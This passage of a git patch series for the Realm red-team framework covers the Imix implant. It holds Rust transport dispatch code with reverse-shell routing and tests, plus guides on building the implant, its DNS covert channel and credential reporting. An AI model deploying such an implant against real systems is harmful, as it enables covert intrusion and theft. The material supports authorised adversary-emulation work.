= "grpc")] + Self::Grpc(t) => t.reverse_shell(rx, tx).await, + #[cfg(feature = "http1")] + Self::Http(t) => t.reverse_shell(rx, tx).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.reverse_shell(rx, tx).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.reverse_shell(rx, tx).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + fn get_type(&mut self) -> beacon::Transport { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.get_type(), + #[cfg(feature = "http1")] + Self::Http(t) => t.get_type(), 
+ #[cfg(feature = "dns")] + Self::Dns(t) => t.get_type(), + #[cfg(feature = "mock")] + Self::Mock(t) => t.get_type(), + Self::Empty => beacon::Transport::Unspecified, + } + } + + fn is_active(&self) -> bool { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.is_active(), + #[cfg(feature = "http1")] + Self::Http(t) => t.is_active(), + #[cfg(feature = "dns")] + Self::Dns(t) => t.is_active(), + #[cfg(feature = "mock")] + Self::Mock(t) => t.is_active(), + Self::Empty => false, + } + } + + fn name(&self) -> &'static str { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.name(), + #[cfg(feature = "http1")] + Self::Http(t) => t.name(), + #[cfg(feature = "dns")] + Self::Dns(t) => t.name(), + #[cfg(feature = "mock")] + Self::Mock(t) => t.name(), + Self::Empty => "none", + } + } + + #[allow(clippy::vec_init_then_push)] + fn list_available(&self) -> Vec { + let mut list = Vec::new(); + #[cfg(feature = "grpc")] + list.push("grpc".to_string()); + #[cfg(feature = "http1")] + list.push("http".to_string()); + #[cfg(feature = "dns")] + list.push("dns".to_string()); + #[cfg(feature = "mock")] + list.push("mock".to_string()); + list + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[tokio::test] + #[cfg(feature = "grpc")] + async fn test_routes_to_grpc_transport() { + // All these prefixes should result in the Grpc variant + let inputs = vec![ + // Passthrough cases + "http://127.0.0.1:50051", + "https://127.0.0.1:50051", + // Rewrite cases + "grpc://127.0.0.1:50051", + "grpcs://127.0.0.1:50051", + ]; + + for uri in inputs { + let result = ActiveTransport::new(uri.to_string(), None); + + // 1. 
Assert strictly on the Variant type + assert!( + matches!(result, Ok(ActiveTransport::Grpc(_))), + "URI '{}' did not resolve to ActiveTransport::Grpc", + uri + ); + } + } + + #[tokio::test] + #[cfg(not(feature = "http1"))] + async fn test_routes_to_http1_transport() { + // All these prefixes should result in the Http1 variant + let inputs = vec!["http1://127.0.0.1:8080", "https1://127.0.0.1:8080"]; + + for uri in inputs { + let result = ActiveTransport::new(uri.to_string(), None); + + assert!( + matches!(result, Ok(ActiveTransport::Http(_))), + "URI '{}' did not resolve to ActiveTransport::Http", + uri + ); + } + } + + #[tokio::test] + #[cfg(feature = "dns")] + async fn test_routes_to_dns_transport() { + // DNS URIs should result in the Dns variant + let inputs = vec![ + "dns://8.8.8.8:53?domain=example.com", + "dns://*?domain=example.com&type=txt", + "dns://1.1.1.1?domain=test.com&type=a", + ]; + + for uri in inputs { + let result = ActiveTransport::new(uri.to_string(), None); + + assert!( + matches!(result, Ok(ActiveTransport::Dns(_))), + "URI '{}' did not resolve to ActiveTransport::Dns", + uri + ); + } + } + + #[tokio::test] + #[cfg(not(feature = "grpc"))] + async fn test_grpc_disabled_error() { + // If the feature is off, these should error out + let inputs = vec!["grpc://foo", "grpcs://foo", "http://foo"]; + for uri in inputs { + let result = ActiveTransport::new(uri.to_string(), None); + assert!( + result.is_err(), + "Expected error for '{}' when gRPC feature is disabled", + uri + ); + } + } + + #[tokio::test] + async fn test_unknown_transport_errors() { + let inputs = vec!["ftp://example.com", "ws://example.com", "random-string", ""]; + + for uri in inputs { + let result = ActiveTransport::new(uri.to_string(), None); + assert!( + result.is_err(), + "Expected error for unknown URI scheme: '{}'", + uri + ); + } + } +} From d0301aa810e9039fbd7738513548e373bc946e11 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: 
Wed, 24 Dec 2025 23:41:20 -0600 Subject: [PATCH 13/17] more line endings --- implants/lib/transport/Cargo.toml | 74 +++++++++++++++---------------- 1 file changed, 37 insertions(+), 37 deletions(-) diff --git a/implants/lib/transport/Cargo.toml b/implants/lib/transport/Cargo.toml index bb225e2b0..bedf5abfb 100644 --- a/implants/lib/transport/Cargo.toml +++ b/implants/lib/transport/Cargo.toml @@ -1,37 +1,37 @@ -[package] -name = "transport" -version = "0.0.5" -edition = "2021" - -[features] -default = [] -grpc = ["pb/grpc"] -grpc-doh = ["grpc", "dep:hickory-resolver"] -http1 = ["pb/http1"] -dns = ["dep:base32", "dep:rand", "dep:hickory-resolver", "dep:url"] -mock = ["dep:mockall"] - -[dependencies] -pb = { workspace = true } - -anyhow = { workspace = true } -bytes = { workspace = true } -futures = { workspace = true } -log = { workspace = true } -prost = { workspace = true } -prost-types = { workspace = true } -tokio = { workspace = true, features = ["macros", "rt-multi-thread"] } -tokio-stream = { workspace = true } -tonic = { workspace = true, features = ["tls-webpki-roots"] } -trait-variant = { workspace = true } -hyper = { version = "0.14", features = [ - "client", -] } # Had to user an older version of hyper to support hyper-proxy -hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls"]} -hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true } -base32 = { version = "0.5", optional = true } -rand = { workspace = true, optional = true } -url = { version = "2.5", optional = true } - -# [feature = mock] -mockall = { workspace = true, optional = true } +[package] +name = "transport" +version = "0.0.5" +edition = "2021" + +[features] +default = [] +grpc = ["pb/grpc"] +grpc-doh = ["grpc", "dep:hickory-resolver"] +http1 = ["pb/http1"] +dns = ["dep:base32", "dep:rand", "dep:hickory-resolver", "dep:url"] +mock = ["dep:mockall"] + +[dependencies] +pb = { workspace = true } + +anyhow = { 
workspace = true } +bytes = { workspace = true } +futures = { workspace = true } +log = { workspace = true } +prost = { workspace = true } +prost-types = { workspace = true } +tokio = { workspace = true, features = ["macros", "rt-multi-thread"] } +tokio-stream = { workspace = true } +tonic = { workspace = true, features = ["tls-webpki-roots"] } +trait-variant = { workspace = true } +hyper = { version = "0.14", features = [ + "client", +] } # Had to user an older version of hyper to support hyper-proxy +hyper-proxy = {version = "0.9.1", default-features = false, features = ["rustls"]} +hickory-resolver = { version = "0.24", features = ["dns-over-https-rustls", "webpki-roots"], optional = true } +base32 = { version = "0.5", optional = true } +rand = { workspace = true, optional = true } +url = { version = "2.5", optional = true } + +# [feature = mock] +mockall = { workspace = true, optional = true } From f2630c486dc65a919ec316c67b37b53fc1515730 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Wed, 24 Dec 2025 23:45:44 -0600 Subject: [PATCH 14/17] missed transport in schema --- tavern/internal/ent/migrate/schema.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tavern/internal/ent/migrate/schema.go b/tavern/internal/ent/migrate/schema.go index d1a262d48..78c9db8ba 100644 --- a/tavern/internal/ent/migrate/schema.go +++ b/tavern/internal/ent/migrate/schema.go @@ -21,7 +21,7 @@ var ( {Name: "last_seen_at", Type: field.TypeTime, Nullable: true}, {Name: "next_seen_at", Type: field.TypeTime, Nullable: true}, {Name: "interval", Type: field.TypeUint64, Nullable: true}, - {Name: "transport", Type: field.TypeEnum, Enums: []string{"TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_UNSPECIFIED"}}, + {Name: "transport", Type: field.TypeEnum, Enums: []string{"TRANSPORT_GRPC", "TRANSPORT_HTTP1", "TRANSPORT_DNS", "TRANSPORT_UNSPECIFIED"}}, {Name: "beacon_host", Type: field.TypeInt}, } // BeaconsTable holds the schema 
information for the "beacons" table. From fc66356b9351c63c388913b3dff3986c3b685d96 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Thu, 25 Dec 2025 12:37:26 -0600 Subject: [PATCH 15/17] Line endings --- docs/_docs/dev-guide/imix.md | 570 +++++++++++++++++----------------- docs/_docs/user-guide/imix.md | 480 ++++++++++++++-------------- 2 files changed, 525 insertions(+), 525 deletions(-) diff --git a/docs/_docs/dev-guide/imix.md b/docs/_docs/dev-guide/imix.md index ff875bf2c..bea5aa0a4 100644 --- a/docs/_docs/dev-guide/imix.md +++ b/docs/_docs/dev-guide/imix.md @@ -1,285 +1,285 @@ ---- -title: Imix -tags: - - Dev Guide -description: Want to implement new functionality in the agent? Start here! -permalink: dev-guide/imix ---- - -## Overview - -Imix in the main bot for Realm. - -## Host Selector - -The host selector defined in `implants/lib/host_selector` allow imix to reliably identify which host it's running on. This is helpful for operators when creating tasking across multiple beacons as well as when searching for command results. Uniqueness is stored as a UUID4 value. - -Out of the box realm comes with two options `File` and `Env` to determine what host it's on. - -`File` will create a file on disk that stores the UUID4 Eg. Linux: - -```bash -[~]$ cat /etc/system-id -36b3c472-d19b-46cc-b3e6-ee6fd8da5b9c -``` - -`Env` will read from the agent environment variables looking for `IMIX_HOST_ID` if it's set it will use the UUID4 string set there. - -There is a third option available on Windows systems to store the UUID value inside a registry key. Follow the steps below to update `lib.rs` to include `Registry` as a default before `File` to enable it. On hosts that are not Windows, imix will simply skip `Registry`. - -If no selectors succeed a random UUID4 ID will be generated and used for the bot. This should be avoided. 
- -## Develop A Host Uniqueness Selector - -To create your own: - -- Navigate to `implants/lib/host_unique` -- Create a file for your selector `touch mac_address.rs` -- Create an implementation of the `HostIDSelector` - -```rust -use uuid::Uuid; - -use crate::HostIDSelector; - -pub struct MacAddress {} - -impl Default for MacAddress { - fn default() -> Self { - MacAddress {} - } -} - -impl HostIDSelector for MacAddress { - fn get_name(&self) -> String { - "mac_address".to_string() - } - - fn get_host_id(&self) -> Option { - // Get the mac address - // Generate a UUID using it - // Return the UUID - // Return None if anything fails - } -} - -#[cfg(test)] -mod tests { - use uuid::uuid; - - use super::*; - - #[test] - fn test_id_mac_consistent() { - let selector = MacAddress {}; - let id_one = selector.get_host_id(); - let id_two = selector.get_host_id(); - - assert_eq!(id_one, id_two); - } -} -``` - -- Update `lib.rs` to re-export your implementation - -```rust -mod mac_address; -pub use mac_address::MacAddress; -``` - -- Update the `defaults()` function to include your implementation. N.B. The order from left to right is the order engines will be evaluated. - -## Develop a New Transport - -We've tried to make Imix super extensible for transport development. In fact, all of the transport specific logic is completely abstracted from how Imix operates for callbacks/tome execution. For Imix all Transports live in the `realm/implants/lib/transport/src` directory. - -### Current Available Transports - -Realm currently includes three transport implementations: - -- **`grpc`** - Default gRPC transport (with optional DoH support via `grpc-doh` feature) -- **`http1`** - HTTP/1.1 transport -- **`dns`** - DNS-based covert channel transport - -**Note:** Only one transport may be selected at compile time. The build will fail if multiple transport features are enabled simultaneously. 
- -### Creating a New Transport - -If creating a new Transport, create a new file in the `realm/implants/lib/transport/src` directory and name it after the protocol you plan to use. For example, if writing a new protocol called "Custom" then call your file `custom.rs`. Then define your public struct where any connection state/clients will be stored. For example, - -```rust -#[derive(Debug, Clone)] -pub struct Custom { - // Your connection state here - // e.g., client: Option -} -``` - -**NOTE:** Your struct **must** derive `Clone` and `Send` as these are required by the Transport trait. Deriving `Debug` is also recommended for troubleshooting. - -Next, we need to implement the Transport trait for our new struct. This will look like: - -```rust -impl Transport for Custom { - fn init() -> Self { - Custom { - // Initialize your connection state here - // e.g., client: None - } - } - fn new(callback: String, proxy_uri: Option) -> Result { - // TODO: setup connection/client hook in proxy, anything else needed - // before functions get called. - Err(anyhow!("Unimplemented!")) - } - async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { - // TODO: How you wish to handle the `claim_tasks` method. - Err(anyhow!("Unimplemented!")) - } - async fn fetch_asset( - &mut self, - request: FetchAssetRequest, - tx: std::sync::mpsc::Sender, - ) -> Result<()> { - // TODO: How you wish to handle the `fetch_asset` method. - Err(anyhow!("Unimplemented!")) - } - async fn report_credential( - &mut self, - request: ReportCredentialRequest, - ) -> Result { - // TODO: How you wish to handle the `report_credential` method. - Err(anyhow!("Unimplemented!")) - } - async fn report_file( - &mut self, - request: std::sync::mpsc::Receiver, - ) -> Result { - // TODO: How you wish to handle the `report_file` method. 
- Err(anyhow!("Unimplemented!")) - } - async fn report_process_list( - &mut self, - request: ReportProcessListRequest, - ) -> Result { - // TODO: How you wish to handle the `report_process_list` method. - Err(anyhow!("Unimplemented!")) - } - async fn report_task_output( - &mut self, - request: ReportTaskOutputRequest, - ) -> Result { - // TODO: How you wish to handle the `report_task_output` method. - Err(anyhow!("Unimplemented!")) - } - async fn reverse_shell( - &mut self, - rx: tokio::sync::mpsc::Receiver, - tx: tokio::sync::mpsc::Sender, - ) -> Result<()> { - // TODO: How you wish to handle the `reverse_shell` method. - Err(anyhow!("Unimplemented!")) - } -} -``` - -NOTE: Be Aware that currently `reverse_shell` uses tokio's sender/reciever while the rest of the methods rely on mpsc's. This is an artifact of some implementation details under the hood of Imix. Some day we may wish to move completely over to tokio's but currenlty it would just result in performance loss/less maintainable code. - -After you implement all the functions and write descriptive error messages for operators to understand why function calls failed, you need to: - -#### 1. Add Compile-Time Exclusivity Checks - -In `realm/implants/lib/transport/src/lib.rs`, add compile-time checks to ensure your new transport cannot be compiled alongside others: - -```rust -// Add your transport to the mutual exclusivity checks -#[cfg(all(feature = "grpc", feature = "custom"))] -compile_error!("only one transport may be selected"); -#[cfg(all(feature = "http1", feature = "custom"))] -compile_error!("only one transport may be selected"); -#[cfg(all(feature = "dns", feature = "custom"))] -compile_error!("only one transport may be selected"); - -// ... existing checks above ... 
- -// Add your transport module and export -#[cfg(feature = "custom")] -mod custom; -#[cfg(feature = "custom")] -pub use custom::Custom as ActiveTransport; -``` - -**Important:** The transport is exported as `ActiveTransport`, not by its type name. This allows the imix agent code to remain transport-agnostic. - -#### 2. Update Transport Library Dependencies - -Add your new feature and any required dependencies to `realm/implants/lib/transport/Cargo.toml`: - -```toml -# more stuff above - -[features] -default = [] -grpc = [] -grpc-doh = ["grpc", "dep:hickory-resolver"] -http1 = [] -dns = ["dep:data-encoding", "dep:rand"] -custom = ["dep:your-custom-dependency"] # <-- Add your feature here -mock = ["dep:mockall"] - -[dependencies] -# ... existing dependencies ... - -# Add any dependencies needed by your transport -your-custom-dependency = { version = "1.0", optional = true } - -# more stuff below -``` - -#### 3. Enable Your Transport in Imix - -To use your new transport, update the imix Cargo.toml at `realm/implants/imix/Cargo.toml`: - -```toml -# more stuff above - -[features] -# Check if compiled by imix -win_service = [] -default = ["transport/grpc"] # Default transport -http1 = ["transport/http1"] -dns = ["transport/dns"] -custom = ["transport/custom"] # <-- Add your feature here -transport-grpc-doh = ["transport/grpc-doh"] - -# more stuff below -``` - -#### 4. Build Imix with Your Transport - -Compile imix with your custom transport: - -```bash -# From the repository root -cd implants/imix - -# Build with your transport feature -cargo build --release --features custom --no-default-features - -# Or for the default transport (grpc) -cargo build --release -``` - -**Important:** Only specify one transport feature at a time. The build will fail if multiple transport features are enabled. Ensure you include `--no-default-features` when building with a non-default transport. - -#### 5. 
Set Up the Corresponding Redirector - -For your agent to communicate, you'll need to implement a corresponding redirector in Tavern. See the redirector implementations in `tavern/internal/redirectors/` for examples: - -- `tavern/internal/redirectors/grpc/` - gRPC redirector -- `tavern/internal/redirectors/http1/` - HTTP/1.1 redirector -- `tavern/internal/redirectors/dns/` - DNS redirector - -Your redirector must implement the `Redirector` interface and register itself in the redirector registry. See `tavern/internal/redirectors/redirector.go` for the interface definition. - -And that's all that is needed for Imix to use a new Transport! The agent code automatically uses whichever transport is enabled at compile time via the `ActiveTransport` type alias. +--- +title: Imix +tags: + - Dev Guide +description: Want to implement new functionality in the agent? Start here! +permalink: dev-guide/imix +--- + +## Overview + +Imix in the main bot for Realm. + +## Host Selector + +The host selector defined in `implants/lib/host_selector` allow imix to reliably identify which host it's running on. This is helpful for operators when creating tasking across multiple beacons as well as when searching for command results. Uniqueness is stored as a UUID4 value. + +Out of the box realm comes with two options `File` and `Env` to determine what host it's on. + +`File` will create a file on disk that stores the UUID4 Eg. Linux: + +```bash +[~]$ cat /etc/system-id +36b3c472-d19b-46cc-b3e6-ee6fd8da5b9c +``` + +`Env` will read from the agent environment variables looking for `IMIX_HOST_ID` if it's set it will use the UUID4 string set there. + +There is a third option available on Windows systems to store the UUID value inside a registry key. Follow the steps below to update `lib.rs` to include `Registry` as a default before `File` to enable it. On hosts that are not Windows, imix will simply skip `Registry`. 
+ +If no selectors succeed a random UUID4 ID will be generated and used for the bot. This should be avoided. + +## Develop A Host Uniqueness Selector + +To create your own: + +- Navigate to `implants/lib/host_unique` +- Create a file for your selector `touch mac_address.rs` +- Create an implementation of the `HostIDSelector` + +```rust +use uuid::Uuid; + +use crate::HostIDSelector; + +pub struct MacAddress {} + +impl Default for MacAddress { + fn default() -> Self { + MacAddress {} + } +} + +impl HostIDSelector for MacAddress { + fn get_name(&self) -> String { + "mac_address".to_string() + } + + fn get_host_id(&self) -> Option { + // Get the mac address + // Generate a UUID using it + // Return the UUID + // Return None if anything fails + } +} + +#[cfg(test)] +mod tests { + use uuid::uuid; + + use super::*; + + #[test] + fn test_id_mac_consistent() { + let selector = MacAddress {}; + let id_one = selector.get_host_id(); + let id_two = selector.get_host_id(); + + assert_eq!(id_one, id_two); + } +} +``` + +- Update `lib.rs` to re-export your implementation + +```rust +mod mac_address; +pub use mac_address::MacAddress; +``` + +- Update the `defaults()` function to include your implementation. N.B. The order from left to right is the order engines will be evaluated. + +## Develop a New Transport + +We've tried to make Imix super extensible for transport development. In fact, all of the transport specific logic is completely abstracted from how Imix operates for callbacks/tome execution. For Imix all Transports live in the `realm/implants/lib/transport/src` directory. + +### Current Available Transports + +Realm currently includes three transport implementations: + +- **`grpc`** - Default gRPC transport (with optional DoH support via `grpc-doh` feature) +- **`http1`** - HTTP/1.1 transport +- **`dns`** - DNS-based covert channel transport + +**Note:** Only one transport may be selected at compile time. 
The build will fail if multiple transport features are enabled simultaneously. + +### Creating a New Transport + +If creating a new Transport, create a new file in the `realm/implants/lib/transport/src` directory and name it after the protocol you plan to use. For example, if writing a new protocol called "Custom" then call your file `custom.rs`. Then define your public struct where any connection state/clients will be stored. For example, + +```rust +#[derive(Debug, Clone)] +pub struct Custom { + // Your connection state here + // e.g., client: Option +} +``` + +**NOTE:** Your struct **must** derive `Clone` and `Send` as these are required by the Transport trait. Deriving `Debug` is also recommended for troubleshooting. + +Next, we need to implement the Transport trait for our new struct. This will look like: + +```rust +impl Transport for Custom { + fn init() -> Self { + Custom { + // Initialize your connection state here + // e.g., client: None + } + } + fn new(callback: String, proxy_uri: Option) -> Result { + // TODO: setup connection/client hook in proxy, anything else needed + // before functions get called. + Err(anyhow!("Unimplemented!")) + } + async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { + // TODO: How you wish to handle the `claim_tasks` method. + Err(anyhow!("Unimplemented!")) + } + async fn fetch_asset( + &mut self, + request: FetchAssetRequest, + tx: std::sync::mpsc::Sender, + ) -> Result<()> { + // TODO: How you wish to handle the `fetch_asset` method. + Err(anyhow!("Unimplemented!")) + } + async fn report_credential( + &mut self, + request: ReportCredentialRequest, + ) -> Result { + // TODO: How you wish to handle the `report_credential` method. + Err(anyhow!("Unimplemented!")) + } + async fn report_file( + &mut self, + request: std::sync::mpsc::Receiver, + ) -> Result { + // TODO: How you wish to handle the `report_file` method. 
+ Err(anyhow!("Unimplemented!")) + } + async fn report_process_list( + &mut self, + request: ReportProcessListRequest, + ) -> Result { + // TODO: How you wish to handle the `report_process_list` method. + Err(anyhow!("Unimplemented!")) + } + async fn report_task_output( + &mut self, + request: ReportTaskOutputRequest, + ) -> Result { + // TODO: How you wish to handle the `report_task_output` method. + Err(anyhow!("Unimplemented!")) + } + async fn reverse_shell( + &mut self, + rx: tokio::sync::mpsc::Receiver, + tx: tokio::sync::mpsc::Sender, + ) -> Result<()> { + // TODO: How you wish to handle the `reverse_shell` method. + Err(anyhow!("Unimplemented!")) + } +} +``` + +NOTE: Be Aware that currently `reverse_shell` uses tokio's sender/reciever while the rest of the methods rely on mpsc's. This is an artifact of some implementation details under the hood of Imix. Some day we may wish to move completely over to tokio's but currenlty it would just result in performance loss/less maintainable code. + +After you implement all the functions and write descriptive error messages for operators to understand why function calls failed, you need to: + +#### 1. Add Compile-Time Exclusivity Checks + +In `realm/implants/lib/transport/src/lib.rs`, add compile-time checks to ensure your new transport cannot be compiled alongside others: + +```rust +// Add your transport to the mutual exclusivity checks +#[cfg(all(feature = "grpc", feature = "custom"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "http1", feature = "custom"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "dns", feature = "custom"))] +compile_error!("only one transport may be selected"); + +// ... existing checks above ... 
+ +// Add your transport module and export +#[cfg(feature = "custom")] +mod custom; +#[cfg(feature = "custom")] +pub use custom::Custom as ActiveTransport; +``` + +**Important:** The transport is exported as `ActiveTransport`, not by its type name. This allows the imix agent code to remain transport-agnostic. + +#### 2. Update Transport Library Dependencies + +Add your new feature and any required dependencies to `realm/implants/lib/transport/Cargo.toml`: + +```toml +# more stuff above + +[features] +default = [] +grpc = [] +grpc-doh = ["grpc", "dep:hickory-resolver"] +http1 = [] +dns = ["dep:data-encoding", "dep:rand"] +custom = ["dep:your-custom-dependency"] # <-- Add your feature here +mock = ["dep:mockall"] + +[dependencies] +# ... existing dependencies ... + +# Add any dependencies needed by your transport +your-custom-dependency = { version = "1.0", optional = true } + +# more stuff below +``` + +#### 3. Enable Your Transport in Imix + +To use your new transport, update the imix Cargo.toml at `realm/implants/imix/Cargo.toml`: + +```toml +# more stuff above + +[features] +# Check if compiled by imix +win_service = [] +default = ["transport/grpc"] # Default transport +http1 = ["transport/http1"] +dns = ["transport/dns"] +custom = ["transport/custom"] # <-- Add your feature here +transport-grpc-doh = ["transport/grpc-doh"] + +# more stuff below +``` + +#### 4. Build Imix with Your Transport + +Compile imix with your custom transport: + +```bash +# From the repository root +cd implants/imix + +# Build with your transport feature +cargo build --release --features custom --no-default-features + +# Or for the default transport (grpc) +cargo build --release +``` + +**Important:** Only specify one transport feature at a time. The build will fail if multiple transport features are enabled. Ensure you include `--no-default-features` when building with a non-default transport. + +#### 5. 
Set Up the Corresponding Redirector + +For your agent to communicate, you'll need to implement a corresponding redirector in Tavern. See the redirector implementations in `tavern/internal/redirectors/` for examples: + +- `tavern/internal/redirectors/grpc/` - gRPC redirector +- `tavern/internal/redirectors/http1/` - HTTP/1.1 redirector +- `tavern/internal/redirectors/dns/` - DNS redirector + +Your redirector must implement the `Redirector` interface and register itself in the redirector registry. See `tavern/internal/redirectors/redirector.go` for the interface definition. + +And that's all that is needed for Imix to use a new Transport! The agent code automatically uses whichever transport is enabled at compile time via the `ActiveTransport` type alias. diff --git a/docs/_docs/user-guide/imix.md b/docs/_docs/user-guide/imix.md index b9766887c..f291c861f 100644 --- a/docs/_docs/user-guide/imix.md +++ b/docs/_docs/user-guide/imix.md @@ -1,240 +1,240 @@ ---- -title: Imix -tags: - - User Guide -description: Imix User Guide -permalink: user-guide/imix ---- -## Imix - -Imix is an offensive security implant designed for stealthy communication and adversary emulation. It functions as a [Beacon](/user-guide/terminology#beacon), receiving [Eldritch](/user-guide/terminology#eldritch) packages called [Tomes](/user-guide/terminology#tome) from a central server ([Tavern](/admin-guide/tavern)) and evaluating them on the host system. It currently supports [gRPC over HTTP(s)](https://grpc.io/) as it's primary communication mechanism, but can be extended to support additional transport channels (see the [developer guide](/dev-guide/tavern#agent-development) for more info). - -## Configuration - -Imix has compile-time configuration, that may be specified using environment variables during `cargo build`. 
- -**We strongly recommend building agents inside the provided devcontainer `.devcontainer`** -Building in the dev container limits variables that might cause issues and is the most tested way to compile. - -| Env Var | Description | Default | Required | -| ------- | ----------- | ------- | -------- | -| IMIX_CALLBACK_URI | URI for initial callbacks (must specify a scheme, e.g. `http://` or `dns://`) | `http://127.0.0.1:8000` | No | -| IMIX_SERVER_PUBKEY | The public key for the tavern server (obtain from server using `curl $IMIX_CALLBACK_URI/status`). | automatic | Yes | -| IMIX_CALLBACK_INTERVAL | Duration between callbacks, in seconds. | `5` | No | -| IMIX_RETRY_INTERVAL | Duration to wait before restarting the agent loop if an error occurs, in seconds. | `5` | No | -| IMIX_PROXY_URI | Overide system settings for proxy URI over HTTP(S) (must specify a scheme, e.g. `https://`) | No proxy | No | -| IMIX_HOST_ID | Manually specify the host ID for this beacon. Supersedes the file on disk. | - | No | -| IMIX_RUN_ONCE | Imix will only do one callback and execution of queued tasks (may want to pair with runtime environment variable `IMIX_BEACON_ID`) | false | No | - -Imix has run-time configuration, that may be specified using environment variables during execution. - -| Env Var | Description | Default | Required | -| ------- | ----------- | ------- | -------- | -| IMIX_BEACON_ID | The identifier to be used during callback (must be globally unique) | Random UUIDv4 | No | -| IMIX_LOG | Log message level for debug builds. See below for more information. | INFO | No | - - - -## Logging - -At runtime, you may use the `IMIX_LOG` environment variable to control log levels and verbosity. See [these docs](https://docs.rs/pretty_env_logger/latest/pretty_env_logger/) for more information. **When building a release version of imix, logging is disabled** and is not included in the released binary. 
- -## Installation - -The install subcommand executes embedded tomes similar to golem. -It will loop through all embedded files looking for main.eldritch. -Each main.eldritch will execute in a new thread. This is done to allow imix to install redundantly or install additional (non dependent) tools. - -Installation scripts are specified in the `realm/implants/imix/install_scripts` directory. - -This feature is currently under active development, and may change. We'll do our best to keep these docs updates in the meantime. - -## Functionality - -Imix derives all it's functionality from the eldritch language. -See the [Eldritch User Guide](/user-guide/eldritch) for more information. - -## Task management - -Imix can execute up to 127 threads concurrently after that the main imix thread will block behind other threads. -Every callback interval imix will query each active thread for new output and rely that back to the c2. This means even long running tasks will report their status as new data comes in. - -## Proxy support - -Imix's default `grpc` transport supports http and https proxies for outbound communication. -By default imix will try to determine the systems proxy settings: - -- On Linux reading the environment variables `http_proxy` and then `https_proxy` -- On Windows - we cannot automatically determine the default proxy -- On MacOS - we cannot automatically determine the default proxy -- On FreeBSD - we cannot automatically determine the default proxy - -## Identifying unique hosts - -Imix communicates which host it's on to Tavern enabling operators to reliably perform per host actions. The default way that imix does this is through a file on disk. We recognize that this may be un-ideal for many situations so we've also provided an environment override and made it easy for admins managing a realm deployment to change how the bot determines uniqueness. - -Imix uses the `host_unique` library under `implants/lib/host_unique` to determine which host it's on. 
The `id` function will fail over all available options returning the first successful ID. If a method is unable to determine the uniqueness of a host it should return `None`. - -We recommend that you use the `File` for the most reliability: - -- Exists across reboots -- Guaranteed to be unique per host (because the bot creates it) -- Can be used by multiple instances of the beacon on the same host. - -If you cannot use the `File` selector we highly recommend manually setting the `Env` selector with the environment variable `IMIX_HOST_ID`. This will override the `File` one avoiding writes to disk but must be managed by the operators. - -For Windows hosts, a `Registry` selector is available, but must be enabled before compilation. See the [imix dev guide](/dev-guide/imix#host-selector) on how to enable it. - -If all uniqueness selectors fail imix will randomly generate a UUID to avoid crashing. -This isn't ideal as in the UI each new beacon will appear as thought it were on a new host. - -## Static cross compilation - -**We strongly recommend building agents inside the provided devcontainer `.devcontainer`** -Building in the dev container limits variables that might cause issues and is the most tested way to compile. - -**Imix requires a server public key so it can encrypt messsages to and from the server check the server log for `level=INFO msg="public key: "`. This base64 encoded string should be passed to the agent using the environment variable `IMIX_SERVER_PUBKEY`** - -## Optional build flags - -These flags are passed to cargo build Eg.: -`cargo build --release --bin imix --bin imix --target=x86_64-unknown-linux-musl --features foo-bar` - -- `--features grpc-doh` - Enable DNS over HTTP using cloudflare DNS for the grpc transport -- `--features http1 --no-default-features` - Changes the default grpc transport to use HTTP/1.1. Requires running the http redirector. -- `--features dns --no-default-features` - Changes the default grpc transport to use DNS. 
Requires running the dns redirector. See the [DNS Transport Configuration](#dns-transport-configuration) section for more information on how to configure the DNS transport URI. - -## Setting encryption key - -By default imix will automatically collect the IMIX_CALLBACK_URI server's public key during the build process. This can be overridden by manually setinng the `IMIX_SERVER_PUBKEY` environment variable but should only be necesarry when using redirectors. Redirectors have no visibliity into the realm encryption by design, this means that agents must be compiled with the upstream tavern instance's public key. - -A server's public key can be found using: -```bash -export IMIX_SERVER_PUBKEY="$(curl $IMIX_CALLBACK_URI/status | jq -r '.Pubkey')" -``` - -### Linux - -```bash -rustup target add x86_64-unknown-linux-musl - -sudo apt update -sudo apt install musl-tools -cd realm/implants/imix/ -export IMIX_CALLBACK_URI="http://localhost" - -cargo build --release --bin imix --target=x86_64-unknown-linux-musl -``` - -### MacOS - -**MacOS does not support static compilation** - - -[Apple's SDK and XCode TOS](https://www.apple.com/legal/sla/docs/xcode.pdf) require compilation be performed on apple hardware. Rust doesn't support cross compiling Linux -> MacOS out of the box due to dependencies on the above SDKs. In order to cross compile you first need to make the SDK available to the runtime. Below we've documented how you can compile MacOS binaries from the Linux devcontainer. - -#### Setup -Setup the MacOS SDK in a place that docker can access. -Rancher desktop doesn't allow you to mount folders besides ~/ and /tmp/ -therefore we need to copy it into an accesible location. -Run the following on your MacOS host: - -```bash -sudo cp -r $(readlink -f $(xcrun --sdk macosx --show-sdk-path)) ~/MacOSX.sdk -``` - -Modify .devcontainer/devcontainer.json by uncommenting the MacOSX.sdk mount. 
